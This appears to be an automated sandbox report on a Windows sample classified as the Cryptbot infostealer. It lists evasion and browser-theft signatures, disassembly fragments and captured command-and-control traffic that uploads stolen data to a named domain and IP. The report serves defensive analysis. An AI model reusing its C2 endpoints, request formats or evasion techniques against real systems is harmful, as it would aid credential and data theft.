Windows Analysis Report
AD4q0qFvM8.exe

Overview

General Information

Sample name: AD4q0qFvM8.exe
renamed because original name is a hash value
Original sample name: 9b5f11b32797376f3e6cd1ecf8186d6f.exe
Analysis ID: 1579773
MD5: 9b5f11b32797376f3e6cd1ecf8186d6f
SHA1: e3017af240a5903abbf28380acecce1e7a2deb53
SHA256: 6e1efd9c3363d42d84e8366950569eec036082d1c906cab945dd6a4246210f39
Tags: exeuser-abuse_ch
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: AD4q0qFvM8.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: AD4q0qFvM8.exe Virustotal: Detection: 69% Perma Link
Source: AD4q0qFvM8.exe ReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: AD4q0qFvM8.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D615B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_00D615B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C0D14B0
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_4d288026-2
Uses 32bit PE files
Source: AD4q0qFvM8.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_00D681E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0F0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1AF960h 8_2_6C0EEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0F4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1784A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C170730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C12A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C1AD014h] 8_2_6C1A4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C147D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C143840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C0FD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C0FD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C149600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C0FD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1ADFF4h 8_2_6C143690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C0FD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C173140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0EB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0FD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C167350
Source: chrome.exe Memory has grown: Private usage: 18MB later: 24MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49740 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49751 -> 185.121.15.192:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 503005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 34 30 34 35 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=Y0KbT1JdUwjemS4N1734940457 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------Au9P7Ay3msDPPR9yDD1x9hData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 75 39 50 37 41 79 33 6d 73 44 50 50 52 39 79 44 44 31 78 39 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 44 61 68 6f 70 6f 78 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 6c 90 a1 b8 ee eb e3 9a 81 71 2a 23 29 19 08 4d e5 24 dd 0f 0b 61 2f 0c 29 21 17 a2 cb 41 bd 91 ec 2b ad 08 90 10 99 e8 5c da 14 5a 73 1d ee 74 15 b0 2c 41 2b 11 fa 84 e1 14 d3 4b 47 57 9b 19 04 57 7a ec e2 d9 03 bc 3c 6d 59 2a a9 3a cf 58 d4 8d 4e b3 df 0a 53 46 f4 07 83 b3 57 d5 9e d1 da f7 33 25 58 32 4d 79 d2 f5 fc 6b fb c2 75 13 a2 59 43 f0 66 91 c8 20 2e 57 e7 f5 09 36 f9 52 78 42 42 5e 92 66 eb 04 09 c7 93 64 f5 68 8e 94 ea 82 4c b4 f2 5b 9b 9d c2 00 59 39 42 8c 4c d2 79 fb 40 98 f9 35 b0 dc 6d 49 b0 d6 54 c5 a7 5a 03 a6 54 7d ff cd 7e cc 21 9f 7d 57 70 35 3b 94 c2 55 84 b9 4b b0 d2 a6 88 e1 51 f7 b4 65 ab c8 31 b9 38 61 63 55 1c 1e a6 02 75 23 3f e8 f2 63 dd 89 60 c9 91 62 8f ae e3 30 89 17 67 30 30 c4 fa fd 47 ec b4 00 47 9c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 75 39 50 37 41 79 33 6d 73 44 50 50 52 39 79 44 44 31 78 39 68 2d 2d 0d 0a Data Ascii: --------------------------Au9P7Ay3msDPPR9yDD1x9hContent-Disposition: form-data; name="file"; filename="Dahopox.bin"Content-Type: application/octet-streamlq*#)M$a/)!A+\Zst,A+KGWWz<mY*:XNSFW3%X2MykuYCf .W6RxBB^fdhL[Y9BLy@5mITZT}~!}Wp5;UKQe18acUu#?c`b0g00GG--------------------------Au9P7Ay3msDPPR9yDD1x9h--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 77706Content-Type: multipart/form-data; boundary=------------------------9vdrbjZGcHGc5WagE7fMG0Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 76 64 72 62 6a 5a 47 63 48 47 63 35 57 61 67 45 37 66 4d 47 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 61 73 61 73 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 01 3a 21 6f 2f d7 65 3c 5b 38 07 7c 53 02 d7 ca de b9 b4 1a 0c eb d6 50 87 29 ac fe 2d 6e 17 90 8e 63 d5 42 b6 d2 46 f5 16 7b 87 0a 94 fa 27 78 28 20 61 01 2d 5b fe 67 73 61 f5 ef aa 96 4e 31 ab 82 d1 68 cf d8 50 fc 74 63 6e 97 f4 bb 80 5d 4c 5a 09 f0 58 46 96 8a 72 43 36 07 66 e4 d6 2e 10 fb a6 47 e6 e0 89 3f b0 a9 47 f0 44 d0 d9 ce 4d 0d 41 7f 34 2b 6e b9 32 a3 7c 4e 4f d9 44 4e 9c f1 d6 4a e1 f0 30 88 4e 03 5a 20 a1 65 59 8b 23 af e4 cd f0 83 b1 5f a3 24 6b ba 98 05 d6 6a a3 04 82 71 2f fc 7d 4b c5 2b a7 88 cf 0f 60 8d 04 f9 96 43 81 02 d2 28 a1 ef 26 b7 59 c5 b4 8e af d4 d5 89 03 1f 2e 65 c8 53 21 b1 9e 2b a8 22 32 b3 2d fb cb e2 be d7 1c 0d e0 51 20 8a 92 20 3e 85 88 d4 5d d5 86 3c df 76 91 d4 a2 d3 ca b1 73 de dc a5 bb 70 42 2e 04 aa 30 6a 7d 75 2d e9 34 79 9b 49 ed f4 61 a5 01 4a 86 ea 26 22 39 92 3e fe 61 e7 9b 52 b7 66 55 52 2e 6a 04 38 c9 a1 10 e7 f3 00 5d ee 9e ea 24 96 9f 0e 61 b8 11 60 2f 20 92 4f 82 3c d1 a6 8d 8c 80 ec de dd 9c 75 d0 45 f5 3f 06 9a 28 8d e8 86 49 35 1f 97 ce 55 3c 6b ee 1a bd 90 80 4c e9 f2 fc 58 7a 4f ac 5a ec 2a ea fe 77 80 56 08 89 40 fa 8d 68 3b e5 5e 3d ea ad 89 94 8e 02 41 68 e7 ed c7 7c aa 4b eb fa 33 e3 c9 0d 17 b4 bb 01 d2 56 10 7f 1d 13 3c 2b 2c d2 2e 88 58 2c 1e b3 e7 4f 7e 12 d8 71 93 8c 46 6e 79 b5 4b 2e dc 87 0e 2d 22 c6 3a 1b 5c 5c 71 93 5a 0e 94 60 8f ed 29 2a a8 9d 35 15 13 31 94 dd 03 77 26 83 42 02 4f fd 0a 3d 09 7a 04 d6 68 49 f7 75 41 8a 77 d8 59 6d bf 6c c7 25 cc a7 f9 5f 38 ca 1e e4 ca 15 1b 94 b0 cd fd c7 5b 2e d5 39 4a 25 45 d8 e6 86 3e af db 5f 93 71 06 ce 2a 35 23 94 e9 37 99 38 e2 92 1f 6d 9c ee 97 5d d4 19 d3 94 61 79 c8 15 92 01 e4 95 70 c7 b6 34 9b 7d d9 a4 b4 1f a5 41 4c f9 d9 37 c1 9a 0f 2d c6 eb e0 97 36 40 76 e8 b4 b6 b4 fb 4d 44 62 25 31 3e 4f 91 f9 90 a3 20 14 08 7b 4c 17 6c 15 cf f3 28 a5 19 d6 db f7 ef 74 b7 bb e5 5e 6b 10 9e 4c 2e 63 67 25 5e fe 4a 45 62 1a df d1 85 d6 a9 e9 e4 97 c8 6f 9a 4f ea ce 47 9b a9 d2 83 83 f5 47 39 28 df da 6c e4 6b f4 f6 d7 e6 e8 0e f1 bb fe 35 42 9b 1e 36 74 76 a8 93 9e f2 8c de fa 7a 98 d6 5d d9 e8 25 cc 01 9c c2 c5 95 a5 cf 06 08 af 7f 73 bc ea fb 75 92 31 32 1c 0e 52 9e f5 31 e1 d4 09 51 67 3f 09 7d 7f 70 cc 23 de 5d 49 1a 01 ef 14 14 18 8a 2c 58 79 0c 93 8b 17 ae ec 43 63 df a0 27 4d 67 0a a6 33 a8 f2 d8 4d 4d a1 30 80 dd 44 fd 5a 63 e0 22 6e 99 7c b8 7b 5b 9e 96 f9 cb e1 0a 32 3e 63
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 27816Content-Type: multipart/form-data; boundary=------------------------tw9lJLMQEqi1JigsVVFqlpData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 74 77 39 6c 4a 4c 4d 51 45 71 69 31 4a 69 67 73 56 56 46 71 6c 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 6b 75 71 65 72 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 4d 7a cd 44 ab d0 a7 fc fa 38 9b 7a 98 65 74 5d d3 52 2f ff 12 a8 fb 6c 88 a0 ee 1b 86 21 ed d2 fb 14 5c 01 c1 77 6d a0 4e 78 04 ae 4d 4c 50 f5 c2 8f db 03 84 1e 82 b0 8b 1d f4 52 da 1d 3f 55 eb 0b c4 35 59 6f 32 6e 6c 86 8c 4b 10 68 69 75 97 2e 1e 9f 19 44 f6 f2 43 53 49 91 2e 03 94 5f 64 16 fc e5 af 77 ee fe 02 9e dd aa c4 5b a5 bd 0f f3 81 52 82 bb 33 9f d6 16 16 37 91 67 d8 63 d1 08 25 a3 21 2b 40 86 b5 c5 b9 36 49 ac ed 2c bc 7a 6a 91 01 08 9f 41 74 be c9 03 2d 96 ac 11 b7 01 c5 92 83 1f 48 05 e1 3b 16 86 28 d2 fb f8 df 0c db dc 74 93 7d 6f 57 ec 3d 40 62 ee 72 ff 1d 06 20 f9 9c ac 7c f3 ff d0 c9 81 5b 5e 7b 82 48 9e cb 17 88 f1 b8 cb 82 f7 8c 28 96 1c 8d e4 4a 42 cc dd 9f f2 45 ff 62 3a 9b 5f 0f d3 d5 ef c4 26 fb c5 be 1b db e9 fc 29 87 9a e2 96 14 3a 44 85 f2 e4 09 f3 f5 f7 3d 8d ef fb 39 a0 14 16 35 1c 07 83 f7 f8 53 99 80 19 54 d1 06 70 f1 7c d2 99 32 14 c7 6c ad 41 35 1d d8 b1 7d c6 1e ad 96 ba fd 24 32 42 ef c8 66 33 46 60 18 fc a0 67 e9 15 36 80 b4 9b 13 88 e4 c2 99 60 d1 a8 54 c5 9c 43 a9 49 35 8d 21 84 a8 90 3b b0 4c 15 c2 d6 58 f2 bd c5 d2 22 92 a8 ca 52 bb 67 36 43 93 9d c8 b4 91 aa a2 a4 db db 34 03 82 c7 dc b6 9c 6b 58 d3 45 90 a4 07 0a 21 31 75 5a b7 7c e5 d8 eb b6 77 89 1b 58 24 ca c4 a4 af 3c 7d 7f ad ce a3 e8 60 bb ae 00 fc fb 73 95 ca d2 18 b0 6d e1 1e 06 cd 86 55 64 67 b9 28 68 8b 5f 15 b3 56 ee cd d7 04 05 fe da 95 eb 5b 31 d9 e9 cb ec 27 8c e1 c6 16 b6 79 0f 4a 26 39 ed c3 c1 8c 71 cb 12 a9 ee 67 9b 7a 34 75 4f 90 ac 93 fa 96 7e 4d 83 c6 17 ca ce 8c 96 81 1a 56 bd 94 95 7f e2 2f 6d 3d d4 8d 3d df 1e da 53 14 f3 85 81 62 e2 94 5d 3f e4 3a 4c 89 db ef d8 d0 a9 0e 39 6f c2 76 9c a5 92 cf e9 60 81 55 49 36 f0 5c d0 9c 8f e4 7f b0 20 fe 01 33 33 8f f5 89 d8 9c b1 d2 85 71 a5 73 f7 a0 56 ec 1e 31 f5 70 4c fc ac 96 a1 b0 32 88 a0 e4 cf f7 f3 ca 35 1f 47 8e 01 c4 aa 31 a6 30 d4 21 c0 15 e7 65 8f af 5f 45 8c 47 2c 4c 15 c3 e3 b1 d8 e8 6c d4 61 c0 ad d0 38 4c e3 83 05 c2 c4 0e e4 86 9c 53 d8 35 91 e3 81 ed c0 79 cd 3e 61 ae 29 f6 ff b8 0f a2 0c c1 61 a4 c4 93 ad c0 01 d9 2a 74 60 4e 10 b4 c1 ab 96 9c 83 b1 3c fd c6 2b 2f 96 82 ab 43 1c 31 33 74 85 65 44 74 b0 9c b4 f4 1a 14 36 6c 34 51 13 60 7f 84 48 13 7e c8 7a ea 83 bb 87 6c f7 6c ee 7f f8 1e 04 ad 2d f2 3b 44 05 f5 b3 7f 7e 1c f3 7a d5 eb 6f 03 68 42 19 5a 80 7f cc 89 08 f8 93 13 a1 d4 d1 77 36 c0 91 ad c3 76 c2
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 59 30 4b 62 54 31 4a 64 55 77 6a 65 6d 53 34 4e 31 37 33 34 39 34 30 34 35 37 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "Y0KbT1JdUwjemS4N1734940457", "data": "Done2" }
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
